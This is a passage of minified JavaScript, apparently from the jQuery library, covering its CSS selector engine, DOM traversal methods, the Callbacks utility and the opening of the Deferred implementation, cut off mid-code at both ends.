RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),z=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),X=new RegExp(W),U=new RegExp("^"+R+"$"),V={ID:new RegExp("^#("+R+")"),CLASS:new RegExp("^\\.("+R+")"),TAG:new RegExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+P+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},G=/^(?:input|select|textarea|button)$/i,Y=/^h\d$/i,Q=/^[^{]+\{\s*\[native \w/,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,K=/[+~]/,Z=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),ee=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:r<0?String.fromCharCode(r+65536):String.fromCharCode(r>>10|55296,1023&r|56320)},te=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ne=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},re=function(){p()},ie=me(function(e){return!0===e.disabled&&("form"in e||"label"in e)},{dir:"parentNode",next:"legend"});try{L.apply(A=H.call(w.childNodes),w.childNodes),A[w.childNodes.length].nodeType}catch(e){L={apply:A.length?function(e,t){q.apply(e,H.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function oe(e,t,r,i){var o,s,l,c,f,h,v,m=t&&t.ownerDocument,T=t?t.nodeType:9;if(r=r||[],"string"!=typeof e||!e||1!==T&&9!==T&&11!==T)return r;if(!i&&((t?t.ownerDocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{if(f[2])return L.apply(r,t.getElementsByTagName(e)),r;if((o=f[3])&&n.getElementsByClassName&&t.getElementsByClassName)return L.apply(r,t.getElementsByClassName(o)),r}if(n.qsa&&!S[e+" "]&&(!y||!y.test(e))){if(1!==T)m=t,v=e;else if("object"!==t.nodeName.toLowerCase()){(c=t.getAttribute("id"))?c=c.replace(te,ne):t.setAttribute("id",c=b),s=(h=a(e)).length;while(s--)h[s]="#"+c+" "+ve(h[s]);v=h.join(","),m=K.test(e)&&ge(t.parentNode)||t}if(v)try{return L.apply(r,m.querySelectorAll(v)),r}catch(e){}finally{c===b&&t.removeAttribute("id")}}}return u(e.replace(B,"$1"),t,r,i)}function ae(){var e=[];function t(n,i){return e.push(n+" ")>r.cacheLength&&delete t[e.shift()],t[n+" "]=i}return t}function se(e){return e[b]=!0,e}function ue(e){var t=d.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function le(e,t){var n=e.split("|"),i=n.length;while(i--)r.attrHandle[n[i]]=t}function ce(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function fe(e){return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!1===t.disabled?"label"in t?"label"in t.parentNode?t.parentNode.disabled===e:t.disabled===e:t.isDisabled===e||t.isDisabled!==!e&&ie(t)===e:t.disabled===e:"label"in t&&t.disabled===e}}function he(e){return se(function(t){return t=+t,se(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}function ge(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}n=oe.support={},o=oe.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return!!t&&"HTML"!==t.nodeName},p=oe.setDocument=function(e){var t,i,a=e?e.ownerDocument||e:w;return a!==d&&9===a.nodeType&&a.documentElement?(d=a,h=d.documentElement,g=!o(d),w!==d&&(i=d.defaultView)&&i.top!==i&&(i.addEventListener?i.addEventListener("unload",re,!1):i.attachEvent&&i.attachEvent("onunload",re)),n.attributes=ue(function(e){return e.className="i",!e.getAttribute("className")}),n.getElementsByTagName=ue(function(e){return e.appendChild(d.createComment("")),!e.getElementsByTagName("*").length}),n.getElementsByClassName=Q.test(d.getElementsByClassName),n.getById=ue(function(e){return h.appendChild(e).id=b,!d.getElementsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);return n?[n]:[]}}):(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){var n="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return n&&n.value===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),r.find.TAG=n.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):n.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},r.find.CLASS=n.getElementsByClassName&&function(e,t){if("undefined"!=typeof t.getElementsByClassName&&g)return t.getElementsByClassName(e)},v=[],y=[],(n.qsa=Q.test(d.querySelectorAll))&&(ue(function(e){h.appendChild(e).innerHTML="<a id='"+b+"'></a><select id='"+b+"-\r\\' msallowcapture=''><option selected=''></option></select>",e.querySelectorAll("[msallowcapture^='']").length&&y.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b+"+*").length||y.push(".#.+[+~]")}),ue(function(e){e.innerHTML="<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>";var t=d.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&y.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&y.push(":enabled",":disabled"),h.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&y.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),y.push(",.*:")})),(n.matchesSelector=Q.test(m=h.matches||h.webkitMatchesSelector||h.mozMatchesSelector||h.oMatchesSelector||h.msMatchesSelector))&&ue(function(e){n.disconnectedMatch=m.call(e,"*"),m.call(e,"[s!='']:x"),v.push("!=",W)}),y=y.length&&new RegExp(y.join("|")),v=v.length&&new RegExp(v.join("|")),t=Q.test(h.compareDocumentPosition),x=t||Q.test(h.contains)?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached&&t.compareDocumentPosition(e)===r?e===d||e.ownerDocument===w&&x(w,e)?-1:t===d||t.ownerDocument===w&&x(w,t)?1:c?O(c,e)-O(c,t):0:4&r?-1:1)}:function(e,t){if(e===t)return f=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e===d?-1:t===d?1:i?-1:o?1:c?O(c,e)-O(c,t):0;if(i===o)return ce(e,t);n=e;while(n=n.parentNode)a.unshift(n);n=t;while(n=n.parentNode)s.unshift(n);while(a[r]===s[r])r++;return r?ce(a[r],s[r]):a[r]===w?-1:s[r]===w?1:0},d):d},oe.matches=function(e,t){return oe(e,null,null,t)},oe.matchesSelector=function(e,t){if((e.ownerDocument||e)!==d&&p(e),t=t.replace(z,"='$1']"),n.matchesSelector&&g&&!S[t+" "]&&(!v||!v.test(t))&&(!y||!y.test(t)))try{var r=m.call(e,t);if(r||n.disconnectedMatch||e.document&&11!==e.document.nodeType)return r}catch(e){}return oe(t,d,null,[e]).length>0},oe.contains=function(e,t){return(e.ownerDocument||e)!==d&&p(e),x(e,t)},oe.attr=function(e,t){(e.ownerDocument||e)!==d&&p(e);var i=r.attrHandle[t.toLowerCase()],o=i&&N.call(r.attrHandle,t.toLowerCase())?i(e,t,!g):void 0;return void 0!==o?o:n.attributes||!g?e.getAttribute(t):(o=e.getAttributeNode(t))&&o.specified?o.value:null},oe.escape=function(e){return(e+"").replace(te,ne)},oe.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},oe.uniqueSort=function(e){var t,r=[],i=0,o=0;if(f=!n.detectDuplicates,c=!n.sortStable&&e.slice(0),e.sort(D),f){while(t=e[o++])t===e[o]&&(i=r.push(o));while(i--)e.splice(r[i],1)}return c=null,e},i=oe.getText=function(e){var t,n="",r=0,o=e.nodeType;if(o){if(1===o||9===o||11===o){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=i(e)}else if(3===o||4===o)return e.nodeValue}else while(t=e[r++])n+=i(t);return n},(r=oe.selectors={cacheLength:50,createPseudo:se,match:V,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(Z,ee),e[3]=(e[3]||e[4]||e[5]||"").replace(Z,ee),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||oe.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&oe.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return V.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&X.test(n)&&(t=a(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(Z,ee).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=E[e+" "];return t||(t=new RegExp("(^|"+M+")"+e+"("+M+"|$)"))&&E(e,function(e){return t.test("string"==typeof e.className&&e.className||"undefined"!=typeof e.getAttribute&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=oe.attr(r,e);return null==i?"!="===t:!t||(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i.replace($," ")+" ").indexOf(n)>-1:"|="===t&&(i===n||i.slice(0,n.length+1)===n+"-"))}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,u){var l,c,f,p,d,h,g=o!==a?"nextSibling":"previousSibling",y=t.parentNode,v=s&&t.nodeName.toLowerCase(),m=!u&&!s,x=!1;if(y){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===v:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?y.firstChild:y.lastChild],a&&m){x=(d=(l=(c=(f=(p=y)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1])&&l[2],p=d&&y.childNodes[d];while(p=++d&&p&&p[g]||(x=d=0)||h.pop())if(1===p.nodeType&&++x&&p===t){c[e]=[T,d,x];break}}else if(m&&(x=d=(l=(c=(f=(p=t)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1]),!1===x)while(p=++d&&p&&p[g]||(x=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===v:1===p.nodeType)&&++x&&(m&&((c=(f=p[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]=[T,x]),p===t))break;return(x-=i)===r||x%r==0&&x/r>=0}}},PSEUDO:function(e,t){var n,i=r.pseudos[e]||r.setFilters[e.toLowerCase()]||oe.error("unsupported pseudo: "+e);return i[b]?i(t):i.length>1?(n=[e,e,"",t],r.setFilters.hasOwnProperty(e.toLowerCase())?se(function(e,n){var r,o=i(e,t),a=o.length;while(a--)e[r=O(e,o[a])]=!(n[r]=o[a])}):function(e){return i(e,0,n)}):i}},pseudos:{not:se(function(e){var t=[],n=[],r=s(e.replace(B,"$1"));return r[b]?se(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),t[0]=null,!n.pop()}}),has:se(function(e){return function(t){return oe(e,t).length>0}}),contains:se(function(e){return e=e.replace(Z,ee),function(t){return(t.textContent||t.innerText||i(t)).indexOf(e)>-1}}),lang:se(function(e){return U.test(e||"")||oe.error("unsupported lang: "+e),e=e.replace(Z,ee).toLowerCase(),function(t){var n;do{if(n=g?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return(n=n.toLowerCase())===e||0===n.indexOf(e+"-")}while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===h},focus:function(e){return e===d.activeElement&&(!d.hasFocus||d.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:de(!1),disabled:de(!0),checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,!0===e.selected},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!r.pseudos.empty(e)},header:function(e){return Y.test(e.nodeName)},input:function(e){return G.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||"text"===t.toLowerCase())},first:he(function(){return[0]}),last:he(function(e,t){return[t-1]}),eq:he(function(e,t,n){return[n<0?n+t:n]}),even:he(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:he(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:he(function(e,t,n){for(var r=n<0?n+t:n;--r>=0;)e.push(r);return e}),gt:he(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}}).pseudos.nth=r.pseudos.eq;for(t in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})r.pseudos[t]=fe(t);for(t in{submit:!0,reset:!0})r.pseudos[t]=pe(t);function ye(){}ye.prototype=r.filters=r.pseudos,r.setFilters=new ye,a=oe.tokenize=function(e,t){var n,i,o,a,s,u,l,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,u=[],l=r.preFilter;while(s){n&&!(i=F.exec(s))||(i&&(s=s.slice(i[0].length)||s),u.push(o=[])),n=!1,(i=_.exec(s))&&(n=i.shift(),o.push({value:n,type:i[0].replace(B," ")}),s=s.slice(n.length));for(a in r.filter)!(i=V[a].exec(s))||l[a]&&!(i=l[a](i))||(n=i.shift(),o.push({value:n,type:a,matches:i}),s=s.slice(n.length));if(!n)break}return t?s.length:s?oe.error(e):k(e,u).slice(0)};function ve(e){for(var t=0,n=e.length,r="";t<n;t++)r+=e[t].value;return r}function me(e,t,n){var r=t.dir,i=t.next,o=i||r,a=n&&"parentNode"===o,s=C++;return t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||a)return e(t,n,i);return!1}:function(t,n,u){var l,c,f,p=[T,s];if(u){while(t=t[r])if((1===t.nodeType||a)&&e(t,n,u))return!0}else while(t=t[r])if(1===t.nodeType||a)if(f=t[b]||(t[b]={}),c=f[t.uniqueID]||(f[t.uniqueID]={}),i&&i===t.nodeName.toLowerCase())t=t[r]||t;else{if((l=c[o])&&l[0]===T&&l[1]===s)return p[2]=l[2];if(c[o]=p,p[2]=e(t,n,u))return!0}return!1}}function xe(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function be(e,t,n){for(var r=0,i=t.length;r<i;r++)oe(e,t[r],n);return n}function we(e,t,n,r,i){for(var o,a=[],s=0,u=e.length,l=null!=t;s<u;s++)(o=e[s])&&(n&&!n(o,r,i)||(a.push(o),l&&t.push(s)));return a}function Te(e,t,n,r,i,o){return r&&!r[b]&&(r=Te(r)),i&&!i[b]&&(i=Te(i,o)),se(function(o,a,s,u){var l,c,f,p=[],d=[],h=a.length,g=o||be(t||"*",s.nodeType?[s]:s,[]),y=!e||!o&&t?g:we(g,p,e,s,u),v=n?i||(o?e:h||r)?[]:a:y;if(n&&n(y,v,s,u),r){l=we(v,d),r(l,[],s,u),c=l.length;while(c--)(f=l[c])&&(v[d[c]]=!(y[d[c]]=f))}if(o){if(i||e){if(i){l=[],c=v.length;while(c--)(f=v[c])&&l.push(y[c]=f);i(null,v=[],l,u)}c=v.length;while(c--)(f=v[c])&&(l=i?O(o,f):p[c])>-1&&(o[l]=!(a[l]=f))}}else v=we(v===a?v.splice(h,v.length):v),i?i(null,a,v,u):L.apply(a,v)})}function Ce(e){for(var t,n,i,o=e.length,a=r.relative[e[0].type],s=a||r.relative[" "],u=a?1:0,c=me(function(e){return e===t},s,!0),f=me(function(e){return O(t,e)>-1},s,!0),p=[function(e,n,r){var i=!a&&(r||n!==l)||((t=n).nodeType?c(e,n,r):f(e,n,r));return t=null,i}];u<o;u++)if(n=r.relative[e[u].type])p=[me(xe(p),n)];else{if((n=r.filter[e[u].type].apply(null,e[u].matches))[b]){for(i=++u;i<o;i++)if(r.relative[e[i].type])break;return Te(u>1&&xe(p),u>1&&ve(e.slice(0,u-1).concat({value:" "===e[u-2].type?"*":""})).replace(B,"$1"),n,u<i&&Ce(e.slice(u,i)),i<o&&Ce(e=e.slice(i)),i<o&&ve(e))}p.push(n)}return xe(p)}function Ee(e,t){var n=t.length>0,i=e.length>0,o=function(o,a,s,u,c){var f,h,y,v=0,m="0",x=o&&[],b=[],w=l,C=o||i&&r.find.TAG("*",c),E=T+=null==w?1:Math.random()||.1,k=C.length;for(c&&(l=a===d||a||c);m!==k&&null!=(f=C[m]);m++){if(i&&f){h=0,a||f.ownerDocument===d||(p(f),s=!g);while(y=e[h++])if(y(f,a||d,s)){u.push(f);break}c&&(T=E)}n&&((f=!y&&f)&&v--,o&&x.push(f))}if(v+=m,n&&m!==v){h=0;while(y=t[h++])y(x,b,a,s);if(o){if(v>0)while(m--)x[m]||b[m]||(b[m]=j.call(u));b=we(b)}L.apply(u,b),c&&!o&&b.length>0&&v+t.length>1&&oe.uniqueSort(u)}return c&&(T=E,l=w),x};return n?se(o):o}return s=oe.compile=function(e,t){var n,r=[],i=[],o=S[e+" "];if(!o){t||(t=a(e)),n=t.length;while(n--)(o=Ce(t[n]))[b]?r.push(o):i.push(o);(o=S(e,Ee(i,r))).selector=e}return o},u=oe.select=function(e,t,n,i){var o,u,l,c,f,p="function"==typeof e&&e,d=!i&&a(e=p.selector||e);if(n=n||[],1===d.length){if((u=d[0]=d[0].slice(0)).length>2&&"ID"===(l=u[0]).type&&9===t.nodeType&&g&&r.relative[u[1].type]){if(!(t=(r.find.ID(l.matches[0].replace(Z,ee),t)||[])[0]))return n;p&&(t=t.parentNode),e=e.slice(u.shift().value.length)}o=V.needsContext.test(e)?0:u.length;while(o--){if(l=u[o],r.relative[c=l.type])break;if((f=r.find[c])&&(i=f(l.matches[0].replace(Z,ee),K.test(u[0].type)&&ge(t.parentNode)||t))){if(u.splice(o,1),!(e=i.length&&ve(u)))return L.apply(n,i),n;break}}}return(p||s(e,d))(i,t,!g,n,!t||K.test(e)&&ge(t.parentNode)||t),n},n.sortStable=b.split("").sort(D).join("")===b,n.detectDuplicates=!!f,p(),n.sortDetached=ue(function(e){return 1&e.compareDocumentPosition(d.createElement("fieldset"))}),ue(function(e){return e.innerHTML="<a href='#'></a>","#"===e.firstChild.getAttribute("href")})||le("type|href|height|width",function(e,t,n){if(!n)return e.getAttribute(t,"type"===t.toLowerCase()?1:2)}),n.attributes&&ue(function(e){return e.innerHTML="<input/>",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||le("value",function(e,t,n){if(!n&&"input"===e.nodeName.toLowerCase())return e.defaultValue}),ue(function(e){return null==e.getAttribute("disabled")})||le(P,function(e,t,n){var r;if(!n)return!0===e[t]?t.toLowerCase():(r=e.getAttributeNode(t))&&r.specified?r.value:null}),oe}(e);w.find=E,w.expr=E.selectors,w.expr[":"]=w.expr.pseudos,w.uniqueSort=w.unique=E.uniqueSort,w.text=E.getText,w.isXMLDoc=E.isXML,w.contains=E.contains,w.escapeSelector=E.escape;var k=function(e,t,n){var r=[],i=void 0!==n;while((e=e[t])&&9!==e.nodeType)if(1===e.nodeType){if(i&&w(e).is(n))break;r.push(e)}return r},S=function(e,t){for(var n=[];e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n},D=w.expr.match.needsContext;function N(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}var A=/^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i;function j(e,t,n){return g(t)?w.grep(e,function(e,r){return!!t.call(e,r,e)!==n}):t.nodeType?w.grep(e,function(e){return e===t!==n}):"string"!=typeof t?w.grep(e,function(e){return u.call(t,e)>-1!==n}):w.filter(t,e,n)}w.filter=function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?w.find.matchesSelector(r,e)?[r]:[]:w.find.matches(e,w.grep(t,function(e){return 1===e.nodeType}))},w.fn.extend({find:function(e){var t,n,r=this.length,i=this;if("string"!=typeof e)return this.pushStack(w(e).filter(function(){for(t=0;t<r;t++)if(w.contains(i[t],this))return!0}));for(n=this.pushStack([]),t=0;t<r;t++)w.find(e,i[t],n);return r>1?w.uniqueSort(n):n},filter:function(e){return this.pushStack(j(this,e||[],!1))},not:function(e){return this.pushStack(j(this,e||[],!0))},is:function(e){return!!j(this,"string"==typeof e&&D.test(e)?w(e):e||[],!1).length}});var q,L=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;(w.fn.init=function(e,t,n){var i,o;if(!e)return this;if(n=n||q,"string"==typeof e){if(!(i="<"===e[0]&&">"===e[e.length-1]&&e.length>=3?[null,e,null]:L.exec(e))||!i[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(i[1]){if(t=t instanceof w?t[0]:t,w.merge(this,w.parseHTML(i[1],t&&t.nodeType?t.ownerDocument||t:r,!0)),A.test(i[1])&&w.isPlainObject(t))for(i in t)g(this[i])?this[i](t[i]):this.attr(i,t[i]);return this}return(o=r.getElementById(i[2]))&&(this[0]=o,this.length=1),this}return e.nodeType?(this[0]=e,this.length=1,this):g(e)?void 0!==n.ready?n.ready(e):e(w):w.makeArray(e,this)}).prototype=w.fn,q=w(r);var H=/^(?:parents|prev(?:Until|All))/,O={children:!0,contents:!0,next:!0,prev:!0};w.fn.extend({has:function(e){var t=w(e,this),n=t.length;return this.filter(function(){for(var e=0;e<n;e++)if(w.contains(this,t[e]))return!0})},closest:function(e,t){var n,r=0,i=this.length,o=[],a="string"!=typeof e&&w(e);if(!D.test(e))for(;r<i;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(n.nodeType<11&&(a?a.index(n)>-1:1===n.nodeType&&w.find.matchesSelector(n,e))){o.push(n);break}return this.pushStack(o.length>1?w.uniqueSort(o):o)},index:function(e){return e?"string"==typeof e?u.call(w(e),this[0]):u.call(this,e.jquery?e[0]:e):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){return this.pushStack(w.uniqueSort(w.merge(this.get(),w(e,t))))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function P(e,t){while((e=e[t])&&1!==e.nodeType);return e}w.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return k(e,"parentNode")},parentsUntil:function(e,t,n){return k(e,"parentNode",n)},next:function(e){return P(e,"nextSibling")},prev:function(e){return P(e,"previousSibling")},nextAll:function(e){return k(e,"nextSibling")},prevAll:function(e){return k(e,"previousSibling")},nextUntil:function(e,t,n){return k(e,"nextSibling",n)},prevUntil:function(e,t,n){return k(e,"previousSibling",n)},siblings:function(e){return S((e.parentNode||{}).firstChild,e)},children:function(e){return S(e.firstChild)},contents:function(e){return N(e,"iframe")?e.contentDocument:(N(e,"template")&&(e=e.content||e),w.merge([],e.childNodes))}},function(e,t){w.fn[e]=function(n,r){var i=w.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof r&&(i=w.filter(r,i)),this.length>1&&(O[e]||w.uniqueSort(i),H.test(e)&&i.reverse()),this.pushStack(i)}});var M=/[^\x20\t\r\n\f]+/g;function R(e){var t={};return w.each(e.match(M)||[],function(e,n){t[n]=!0}),t}w.Callbacks=function(e){e="string"==typeof e?R(e):w.extend({},e);var t,n,r,i,o=[],a=[],s=-1,u=function(){for(i=i||e.once,r=t=!0;a.length;s=-1){n=a.shift();while(++s<o.length)!1===o[s].apply(n[0],n[1])&&e.stopOnFalse&&(s=o.length,n=!1)}e.memory||(n=!1),t=!1,i&&(o=n?[]:"")},l={add:function(){return o&&(n&&!t&&(s=o.length-1,a.push(n)),function t(n){w.each(n,function(n,r){g(r)?e.unique&&l.has(r)||o.push(r):r&&r.length&&"string"!==x(r)&&t(r)})}(arguments),n&&!t&&u()),this},remove:function(){return w.each(arguments,function(e,t){var n;while((n=w.inArray(t,o,n))>-1)o.splice(n,1),n<=s&&s--}),this},has:function(e){return e?w.inArray(e,o)>-1:o.length>0},empty:function(){return o&&(o=[]),this},disable:function(){return i=a=[],o=n="",this},disabled:function(){return!o},lock:function(){return i=a=[],n||t||(o=n=""),this},locked:function(){return!!i},fireWith:function(e,n){return i||(n=[e,(n=n||[]).slice?n.slice():n],a.push(n),t||u()),this},fire:function(){return l.fireWith(this,arguments),this},fired:function(){return!!r}};return l};function I(e){return e}function W(e){throw e}function $(e,t,n,r){var i;try{e&&g(i=e.promise)?i.call(e).done(t).fail(n):e&&g(i=e.then)?i.call(e,t,n):t.apply(void 0,[e].slice(r))}catch(e){n.apply(void 0,[e])}}w.extend({Deferred:function(t){var n=[["notify","progress",w.Callbacks("memory"),w.Callbacks("memory"),2],["resolve","done",w.Callbacks("once memory"),w.Callbacks("once memory"),0,"resolved"],["reject","fail",w.Callbacks("once memory"),w.Callbacks("once memory"),1,"rejected"]],r="pending",i={state:function(){return r},always:function(){return o.done(arguments).fail(arguments),this},"catch":function(e){return i.then(null,e)},pipe:function(){var e=arguments;return w.Deferred(function(t){w.each(n,function(n,r){var i=g(e[r[4]])&&e[r[4]];o[r[1]](function(){var e=i&&i.apply(this,arguments);e&&g(e.promise)?e.promise().progress(t.notify).done(t.resolve).fail(t.reject):t[r[0]+"With"](this,i?[e]:arguments)})}),e=null}).promise()},then:function(t,r,i){var o=0;function a(t,n,r,i){return function(){var s=this,u=arguments,l=function(){var e,l;if(!(t<o)){if((e=r.apply(s,u))===n.promise())throw new TypeError("Thenable self-resolution");l=e&&("object"==typeof e||"function"==typeof e)&&e.then,g(l)?i?l.call(e,a(o,n,I,i),a(o,n,W,i)):(o++,l.call(e,a(o,n,I,i),a(o,n,W,i),a(o,n,I,n.notifyWith))):(r!==I&&(s=void 0,u=[e]),(i||n.resolveWith)(s,u))}},c=i?l:function(){try{l()}catch(e){w.Deferred.exceptionHook&&w.Deferred.exceptionHook(e,c.stackTrace),t+1>=o&&(r!==W&&(s=void 0,u=[e]),n.rejectWith(s,u))}};t?c():(w.Deferred.getStackHook&&(c.stackTrace=w.Deferred.getStackHook()),e.setTimeout(c))}}return w.Deferred(function(e){n[0][3].add(a(0,e,g(i)?i:I,e.notifyWith)),n[1][3].add(a(0,e,g(t)?t:I)),n[2][3].add(a(0,e,g(r)?r:W))}).promise()},promise:function(e){return null!=e?w.extend(e,i):i}},o={};return w.each(n,function(e,t){var a=t[2],s=t[5];i[t[1]]=a.add,s&&a.add(function(){r=s},n[3-e][2].disable,n[3-e][3].disable,n[0][2].lock,n[0][3].lock),a.add(t[3].fire),o[t[0]]=function(){return 